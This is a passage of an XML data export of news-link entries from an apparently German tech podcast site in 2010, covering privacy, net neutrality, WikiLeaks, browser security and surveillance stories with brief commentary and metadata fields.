&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/open-source/news/2010/08/court-rules-gpl-part-of-a-well-pleaded-case.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/08/05/busyboxtakesoutbankruptopponentingpllawsuit.png</field><field type="SlugField" name="slug">busyboxtakesoutbankruptopponentingpllawsuit</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-05 22:59:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">gpl license</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="372" model="submitter.newsentry"><field type="CharField" name="title">Surprise! Feds stored thousands of checkpoint body scan images after all</field><field type="TextField" name="excerpt">Now it turns out that some police agencies are storing the controversial images after all. The U.S. Marshals Service admitted this week that it had surreptitiously saved tens of thousands of images recorded with a millimeter wave system at the security checkpoint of a single Florida courthouse.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Now it turns out that some police agencies are storing the controversial images after all. The U.S. Marshals Service admitted this week that it had surreptitiously saved tens of thousands of images recorded with a millimeter wave system at the security checkpoint of a single Florida courthouse.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://news.cnet.com/8301-31921_3-20012583-281.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/05/surprisefedsstoredthousandsofcheckpointbody.png</field><field type="SlugField" name="slug">surprisefedsstoredthousandsofcheckpointbody</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-05 17:02:32</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">nacktscanner privacy security theater</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="371" model="submitter.newsentry"><field type="CharField" name="title">UK government: Upgrading away from IE6 costs too much</field><field type="TextField" name="excerpt">m( Die Kosten rechnen sich nicht IE6 abzulösen.
The UK government is not yet interested in ditching Internet Explorer 6, saying the costs required to do so outweigh the benefits. Six months ago, an online petition started in hopes that the UK would abolish all use of the world's most-loathed browser.
The petition debuted soon after the German and French governments began to advise their citizens to use a different browser than IE in the wake of the Chinese-Google hack attack. It closed on June 6 after gathering 6,223 signatures; on July 30, the government gave an official response. Here's the crux of it:
Complex software will always have vulnerabilities and motivated adversaries will always work to discover and take advantage of them. There is no evidence that upgrading away from the latest fully patched versions of Internet Explorer to other browsers will make users more secure. Regular software patching and updating will help defend against the latest threats. The Government continues to work with Microsoft and other internet browser suppliers to understand the security of the products used by HMG, including Internet Explorer and we welcome the work that Microsoft are continuing do on delivering security solutions which are deployed as quickly as possible to all Internet Explorer users.
The UK government is correct in saying that Microsoft will </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;m( Die Kosten rechnen sich nicht IE6 abzulösen.
&lt;/p&gt;
&lt;p&gt;The UK government is not yet interested in ditching Internet Explorer 6, saying the costs required to do so outweigh the benefits. Six months ago, an online petition started in hopes that the UK would abolish all use of the world's most-loathed browser.
&lt;/p&gt;
&lt;p&gt;The petition debuted soon after the German and French governments began to advise their citizens to use a different browser than IE in the wake of the Chinese-Google hack attack. It closed on June 6 after gathering 6,223 signatures; on July 30, the government gave an official response. Here's the crux of it:
&lt;/p&gt;
&lt;p&gt;Complex software will always have vulnerabilities and motivated adversaries will always work to discover and take advantage of them. There is no evidence that upgrading away from the latest fully patched versions of Internet Explorer to other browsers will make users more secure. Regular software patching and updating will help defend against the latest threats. The Government continues to work with Microsoft and other internet browser suppliers to understand the security of the products used by HMG, including Internet Explorer and we welcome the work that Microsoft are continuing do on delivering security solutions which are deployed as quickly as possible to all Internet Explorer users.
The UK government is correct in saying that Microsoft will
&lt;/p&gt;</field><field type="CharField" name="external_url">http://arstechnica.com/microsoft/news/2010/08/despite-petition-uk-government-to-keep-ie6.ars</field><field type="FileField" name="page_screenshot">page_shots/2010/08/05/ukgovernmentupgradingawayfromie6coststoom.png</field><field type="SlugField" name="slug">ukgovernmentupgradingawayfromie6coststoom</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-05 09:48:02</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">goverment ie6 microsoft uk</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="370" model="submitter.newsentry"><field type="CharField" name="title">Google and Verizon in Talks on Selling Internet Priority - NYTimes.com</field><field type="TextField" name="excerpt">Netneutrality my ass - Don't be evil.
Google and Verizon, two leading players in Internet service and content, are nearing an agreement that could allow Verizon to speed some online content to Internet users more quickly if the contents creators are willing to pay for the privilege.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Netneutrality my ass - Don't be evil.
&lt;/p&gt;
&lt;p&gt;Google and Verizon, two leading players in Internet service and content, are nearing an agreement that could allow Verizon to speed some online content to Internet users more quickly if the contents creators are willing to pay for the privilege.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.nytimes.com/2010/08/05/technology/05secret.html?_r=4</field><field type="FileField" name="page_screenshot">page_shots/2010/08/05/googleandverizonintalksonsellinginternetpr.png</field><field type="SlugField" name="slug">googleandverizonintalksonsellinginternetpr</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-05 09:44:22</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">google netneutrality</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="369" model="submitter.newsentry"><field type="CharField" name="title">heise online - US-Bürgerrechtler sammeln weiter Argumente gegen Nacktscanner</field><field type="TextField" name="excerpt">Nachdem im April die Sicherheitsbehörde Transportation Security Administration (TSA) eingeräumt hatte, entgegen früherer Beteuerungen rund 2000 von Nacktscannern gefertigte Bilder gespeichert zu haben, hat auch der U.S. Marshals Service (USMS) die mit einem Scanner angefertigten Aufnahmen nicht gelöscht.
Das EPIC hat vom US-amerikanischen Justizministerium, dem die Justizvollzugsbeamten des USMS angehören, die schriftliche Auskunft (PDF-Datei) erhalten, dass auf einem Gerät des Typs Brijot Gen2 gut 35.000 Bilder abgespeichert wurden. Der Scanner sei in einem Gerichtsgebäude in Orlando im US-Bundesstaat Florida eingesetzt worden. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Nachdem im April die Sicherheitsbehörde Transportation Security Administration (TSA) eingeräumt hatte, entgegen früherer Beteuerungen rund 2000 von Nacktscannern gefertigte Bilder gespeichert zu haben, hat auch der U.S. Marshals Service (USMS) die mit einem Scanner angefertigten Aufnahmen nicht gelöscht.
&lt;/p&gt;
&lt;p&gt;Das EPIC hat vom US-amerikanischen Justizministerium, dem die Justizvollzugsbeamten des USMS angehören, die schriftliche Auskunft (PDF-Datei) erhalten, dass auf einem Gerät des Typs Brijot Gen2 gut 35.000 Bilder abgespeichert wurden. Der Scanner sei in einem Gerichtsgebäude in Orlando im US-Bundesstaat Florida eingesetzt worden.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/US-Buergerrechtler-sammeln-weiter-Argumente-gegen-Nacktscanner-1050665.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/04/heiseonline-us-burgerrechtlersammelnweiterar.png</field><field type="SlugField" name="slug">heiseonline-us-burgerrechtlersammelnweiterar</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-04 15:01:54</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">epic nacktscanner tsa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="368" model="submitter.newsentry"><field type="CharField" name="title">Collateral Murder-Video: Erstaunliche Wendung in Sachen Wikileaks - Medien - Feuilleton - FAZ.NET</field><field type="TextField" name="excerpt">Private Schnüffelorganisation analysiert das Internet seit 14 Jahren! Darüber soll Manning ermittelt worden sein.
Mit diesem Bekenntnis erfährt die Geschichte um Wikileaks eine neue Wendung. Stimmen die Angaben von Chet Uber, ist Bradley Manning nicht mehr der allzu naive Soldat, der sich einem überraschten Dritten anvertraute. Stimmen die Angaben, werden amerikanische Bürger in größerem Stil überwacht als bisher angenommen, mit steigender Tendenz: „Project Vigilant“ will die Zahl seiner Freiwilligen auf 1600 aufstocken, so erklärte es Chet Uber auf der Defcon-Konferenz, wo er um Freiwillige warb. Der Ablauf der Ereignisse ist noch nicht vollständig geklärt und erklärt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Private Schnüffelorganisation analysiert das Internet seit 14 Jahren! Darüber soll Manning ermittelt worden sein.
&lt;/p&gt;
&lt;p&gt;Mit diesem Bekenntnis erfährt die Geschichte um Wikileaks eine neue Wendung. Stimmen die Angaben von Chet Uber, ist Bradley Manning nicht mehr der allzu naive Soldat, der sich einem überraschten Dritten anvertraute. Stimmen die Angaben, werden amerikanische Bürger in größerem Stil überwacht als bisher angenommen, mit steigender Tendenz: „Project Vigilant“ will die Zahl seiner Freiwilligen auf 1600 aufstocken, so erklärte es Chet Uber auf der Defcon-Konferenz, wo er um Freiwillige warb. Der Ablauf der Ereignisse ist noch nicht vollständig geklärt und erklärt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.faz.net/s/Rub475F682E3FC24868A8A5276D4FB916D7/Doc~EB7743084C84B417480B1175808764D35~ATpl~Ecommon~Scontent.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/03/132collateralmurder147-videoerstaunliche_.png</field><field type="SlugField" name="slug">132collateralmurder147-videoerstaunliche</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-03 18:13:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">observation privacy viligant</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object></field></object><object pk="367" model="submitter.newsentry"><field type="CharField" name="title">
Bing Adds Open Street Map
</field><field type="TextField" name="excerpt">Openstreetmap-Data in Bing. Weiß nicht, ob das so wichtig ist, aber ich finde es cool für das OSM-Projekt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Openstreetmap-Data in Bing. Weiß nicht, ob das so wichtig ist, aber ich finde es cool für das OSM-Projekt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.readwriteweb.com/archives/bing_adds_open_street_map.php</field><field type="FileField" name="page_screenshot">page_shots/2010/08/03/no_page_shot_.png</field><field type="SlugField" name="slug">bingaddsopenstreetmap</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-03 17:47:40</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">bing openstreetmap</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="366" model="submitter.newsentry"><field type="CharField" name="title">RIAA, FBI issuing takedown requests for Radiohead's "In Rainbows"</field><field type="TextField" name="excerpt">TorrentFreak reports that the RIAA and FBI are sending takedown notices to people sharing Radiohead's "self-released" album "In Rainbows," which was released in MP3 form at the time for whatever fans wanted to pay (though there were some oddly conflicting messages later from the band's management).</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;TorrentFreak reports that the RIAA and FBI are sending takedown notices to people sharing Radiohead's "self-released" album "In Rainbows," which was released in MP3 form at the time for whatever fans wanted to pay (though there were some oddly conflicting messages later from the band's management).
&lt;/p&gt;</field><field type="CharField" name="external_url">http://torrentfreak.com/riaa-protects-radioheads-in-rainbows-100801/?utm_source=feedburner&amp;utm_medium=feed&amp;utm_campaign=Feed%3A%20Torrentfreak%20%28Torrentfreak%29</field><field type="FileField" name="page_screenshot">page_shots/2010/08/03/riaafbiissuingtakedownrequestsforradiohead.png</field><field type="SlugField" name="slug">riaafbiissuingtakedownrequestsforradiohead</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-03 17:13:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">contentmafia, copyfight, file sharing, riaa</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="364" model="submitter.newsentry"><field type="CharField" name="title">Microsoft quashed IE privacy controls for the ad industry</field><field type="TextField" name="excerpt">Microsoft gutted a new privacy control system from Internet Explorer 8 at the behest of the advertising industry and its own marketing executives. </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Microsoft gutted a new privacy control system from Internet Explorer 8 at the behest of the advertising industry and its own marketing executives.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.wired.com/epicenter/2010/08/ie8-waterdown-privacy/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/03/microsoftquashedieprivacycontrolsfortheadi.png</field><field type="SlugField" name="slug">microsoftquashedieprivacycontrolsfortheadi</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-03 17:11:51</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">microsoft online privacy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="2"></object></field></object><object pk="363" model="submitter.newsentry"><field type="CharField" name="title"> FBI will Wikipedia Nutzung seines Logos untersagen : netzpolitik.org</field><field type="TextField" name="excerpt">FBI mag nicht, dass ihr Logo in der Wikipedia steht.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;FBI mag nicht, dass ihr Logo in der Wikipedia steht.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/fbi-will-wikipedia-nutzung-seines-logos-untersagen/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/03/fbiwillwikipedianutzungseineslogosuntersag.png</field><field type="SlugField" name="slug">fbiwillwikipedianutzungseineslogosuntersag</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-03 15:43:17</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">fbi wikipedia</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="362" model="submitter.newsentry"><field type="CharField" name="title">Homebrew-Tool gegen kritische iPhone-PDF-Lücke</field><field type="TextField" name="excerpt">Während die Homebrew-Szene bereits ein Tool für gejailbreakte iPhones entwickelt hat, müssen Anwender unmodifizierter Apple-Geräte noch auf einen offziellen Patch warten.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Während die Homebrew-Szene bereits ein Tool für gejailbreakte iPhones entwickelt hat, müssen Anwender unmodifizierter Apple-Geräte noch auf einen offziellen Patch warten.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Homebrew-Tool-gegen-kritische-iPhone-PDF-Luecke-1049564.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/03/homebrew-toolgegenkritischeiphone-pdf-lucke.png</field><field type="SlugField" name="slug">homebrew-toolgegenkritischeiphone-pdf-lucke</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-03 13:36:23</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">apple diy</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object><object pk="9"></object></field></object><object pk="361" model="submitter.newsentry"><field type="CharField" name="title">Botnet with 60GB of stolen data cracked wide open • The Register</field><field type="TextField" name="excerpt">Size matters: Botnet mit 60 GB Daten geknackt.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Size matters: Botnet mit 60 GB Daten geknackt.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.theregister.co.uk/2010/08/02/mumba_botnet_infiltrated/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/03/botnetwith60gbofstolendatacrackedwideopen.png</field><field type="SlugField" name="slug">botnetwith60gbofstolendatacrackedwideopen</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-03 10:49:56</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">botnet</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="360" model="submitter.newsentry"><field type="CharField" name="title">Panne in Tschechien: Namen Tausender Agenten im Internet veröffentlicht - SPIEGEL ONLINE - Nachrichten - Politik</field><field type="TextField" name="excerpt">Tschechien wird zur ernsthaften Konkurenz zu WL</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Tschechien wird zur ernsthaften Konkurenz zu WL
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.spiegel.de/politik/ausland/0,1518,709806,00.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/02/panneintschechiennamentausenderagentenimin.png</field><field type="SlugField" name="slug">panneintschechiennamentausenderagentenimin</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-02 22:28:03</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">wikileaks</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="359" model="submitter.newsentry"><field type="CharField" name="title"> Londoner Polizei wurde beim fälschen von CCTV-Videos erwischt : netzpolitik.org</field><field type="TextField" name="excerpt">Wenn die Bilder nicht gut genug sind: Police London fälscht cctv videos. Evtl. sollten wir echt den Photoshop des Monats einführen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Wenn die Bilder nicht gut genug sind: Police London fälscht cctv videos. Evtl. sollten wir echt den Photoshop des Monats einführen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.netzpolitik.org/2010/londoner-polizei-wurde-beim-falschen-von-cctv-videos-erwischt/</field><field type="FileField" name="page_screenshot">page_shots/2010/08/02/londonerpolizeiwurdebeimfalschenvoncctv-vi.png</field><field type="SlugField" name="slug">londonerpolizeiwurdebeimfalschenvoncctv-vi</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-02 22:18:49</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">cctv photoshop</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="358" model="submitter.newsentry"><field type="CharField" name="title">BlackBerry encryption too secure National security vs. consumer privacy</field><field type="TextField" name="excerpt">Weil die Inder Blackberries nicht knacken können, werden Dienste davon verboten...
The Indian governments internal security and intelligence services cannot break the encryption of the device, which makes countering terror threats and national security matters difficult - especially for a region which faces constant threats and attacks from domestic Maoist insurgents and extremist Islamic groups.
The BBC confirmed via the UAEs state media that come October, all half a million BlackBerry users in the region will have some services suspended unless a “solution compatible with local laws is reached”, amid national security concerns.
Sie haben auch schon [Google und Skype](http://www.itworld.com/security/117278/india-may-put-restrictions-skype-and-google) im Visier.
Noch mehr links [Computerworld](http://www.computerworld.com/s/article/9180563/Indian_government_to_meet_operators_over_the_BlackBerry?taxonomyId=145), </field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Weil die Inder Blackberries nicht knacken können, werden Dienste davon verboten...
The Indian governments internal security and intelligence services cannot break the encryption of the device, which makes countering terror threats and national security matters difficult - especially for a region which faces constant threats and attacks from domestic Maoist insurgents and extremist Islamic groups.
&lt;/p&gt;
&lt;p&gt;The BBC confirmed via the UAEs state media that come October, all half a million BlackBerry users in the region will have some services suspended unless a “solution compatible with local laws is reached”, amid national security concerns.
&lt;/p&gt;
&lt;p&gt;Sie haben auch schon &lt;a href="http://www.itworld.com/security/117278/india-may-put-restrictions-skype-and-google"&gt;Google und Skype&lt;/a&gt; im Visier.
&lt;/p&gt;
&lt;p&gt;Noch mehr links &lt;a href="http://www.computerworld.com/s/article/9180563/Indian_government_to_meet_operators_over_the_BlackBerry?taxonomyId=145"&gt;Computerworld&lt;/a&gt;,
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.zdnet.com/blog/igeneration/blackberry-encryption-too-secure-national-security-vs-consumer-privacy/5732?</field><field type="FileField" name="page_screenshot">page_shots/2010/08/17/blackberryencryption039toosecure039nati.png</field><field type="SlugField" name="slug">blackberryencryption039toosecure039nati</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-01 23:15:00</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">blackberry india rim</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="7"></object></field></object><object pk="357" model="submitter.newsentry"><field type="CharField" name="title">Man faces jail for videotaping gun-waving cop</field><field type="TextField" name="excerpt">Police officer Joseph Uhler was caught on film charging out of his unmarked car and waving his gun at a unarmed motorcyclist pulled over for speeding. When the footage was uploaded to YouTube, authorities raided Anthony Graber's home, siezed his computers, arrested him, and charged him with "wiretapping" offenses that could land him in jail for 16 years. Indeed, Maryland contends that Uhler had a reasonable expectation of privacy while waving his gun around in public and yelling at a motorist with a giant video camera mounted on the top of his helmet.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Police officer Joseph Uhler was caught on film charging out of his unmarked car and waving his gun at a unarmed motorcyclist pulled over for speeding. When the footage was uploaded to YouTube, authorities raided Anthony Graber's home, siezed his computers, arrested him, and charged him with "wiretapping" offenses that could land him in jail for 16 years. Indeed, Maryland contends that Uhler had a reasonable expectation of privacy while waving his gun around in public and yelling at a motorist with a giant video camera mounted on the top of his helmet.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.mclu.org/node/653</field><field type="FileField" name="page_screenshot">page_shots/2010/08/01/manfacesjailforvideotapinggun-wavingcop.png</field><field type="SlugField" name="slug">manfacesjailforvideotapinggun-wavingcop</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">13</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-01 19:21:13</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">police public surveillance video</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="3"></object><object pk="7"></object></field></object><object pk="356" model="submitter.newsentry"><field type="CharField" name="title">heise online - CCC: Wir kommen in Frieden</field><field type="TextField" name="excerpt">Congress CfP started. Motto: "We come in peace"</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Congress CfP started. Motto: "We come in peace"
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/CCC-Wir-kommen-in-Frieden-1048810.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/01/heiseonline-cccwirkommeninfrieden.png</field><field type="SlugField" name="slug">heiseonline-cccwirkommeninfrieden</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-01 18:35:43</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">ccc</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="4"></object></field></object><object pk="355" model="submitter.newsentry"><field type="CharField" name="title">heise online - Apple beantragt Patente für Reise- und Mode-Apps</field><field type="TextField" name="excerpt">Webportale zum Buchen von Hotels und Reisen gibt es nicht erst sei gestern. Und auch dedizierte Anwendungen aus diesem Bereich für das iPhone oder andere Smartphones sind keine Mangelware. Trotzdem beantragte Apple im Oktober vergangenen Jahres in den USA drei Patente, die solche Anwendungen schützen sollen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Webportale zum Buchen von Hotels und Reisen gibt es nicht erst sei gestern. Und auch dedizierte Anwendungen aus diesem Bereich für das iPhone oder andere Smartphones sind keine Mangelware. Trotzdem beantragte Apple im Oktober vergangenen Jahres in den USA drei Patente, die solche Anwendungen schützen sollen.
&lt;/p&gt;</field><field type="CharField" name="external_url">http://www.heise.de/newsticker/meldung/Apple-beantragt-Patente-fuer-Reise-und-Mode-Apps-1048876.html</field><field type="FileField" name="page_screenshot">page_shots/2010/08/01/heiseonline-applebeantragtpatentefurreise.png</field><field type="SlugField" name="slug">heiseonline-applebeantragtpatentefurreise</field><field to="submitter.submitter" name="author" rel="ManyToOneRel">1</field><field type="BooleanField" name="enable_comments">1</field><field type="BooleanField" name="featured">0</field><field type="IntegerField" name="status">1</field><field type="DateTimeField" name="submit_date">2010-08-01 18:34:11</field><field to="show.pentashow" name="show" rel="ManyToOneRel">6</field><field type="CharField" name="tags_string">apple travel</field><field to="submitter.entrycategory" name="categories" rel="ManyToManyRel"><object pk="1"></object></field></object><object pk="354" model="submitter.newsentry"><field type="CharField" name="title">heise online - IMSI-Catcher für 1500 Euro im Eigenbau</field><field type="TextField" name="excerpt">Chris Paget erstmals seinen selbst gebauten IMSI-Catcher zum Belauschen von GSM-Netzen öffentlich auf ein Mobilfunknetz losgelassen. Der britischen Hackers ließ seine Konstruktion, bestehend aus einer programmierbaren Funkhardware (USRP, Universal Software Radio Peripheral) und der Open-Source-Software OpenBTS, das Netz von AT&amp;T nachahmen. Nach wenigen Minuten waren bereits über 30 Mobiltelefone mit seiner Basisstation verbunden.
GSM ist wohl damit genau so kaputt wie WEP. Security by Obscurity #fail.
Diese Nachricht ist nur ein Baustein dazu. Müssen mal die anderen noch etwas zusammen sammeln und das gemeinsam würdigen.</field><field type="TextField" name="body"></field><field type="TextField" name="body_html"></field><field type="TextField" name="excerpt_html">&lt;p&gt;Chris Paget erstmals seinen selbst gebauten IMSI-Catcher zum Belauschen von GSM-Netzen öffentlich auf ein Mobilfunknetz losgelassen. Der britischen Hackers ließ seine Konstruktion, bestehend aus einer programmierbaren Funkhardware (USRP, Universal Software Radio Peripheral) und der Open-Source-Software OpenBTS, das Netz von AT&amp;amp;T nachahmen. Nach wenigen Minuten waren bereits über 30 Mobiltelefone mit seiner Basisstation verbunden.
&lt;/p&gt;
&lt;p&gt;GSM ist wohl damit genau so kaputt wie WEP. Security by Obscurity #fail.
&lt;/p&gt;
&lt;p&gt;Diese Nachricht ist nur ein Baustein dazu. Müssen mal die anderen noch etwas zusammen sammeln und das gemeinsam würdigen.
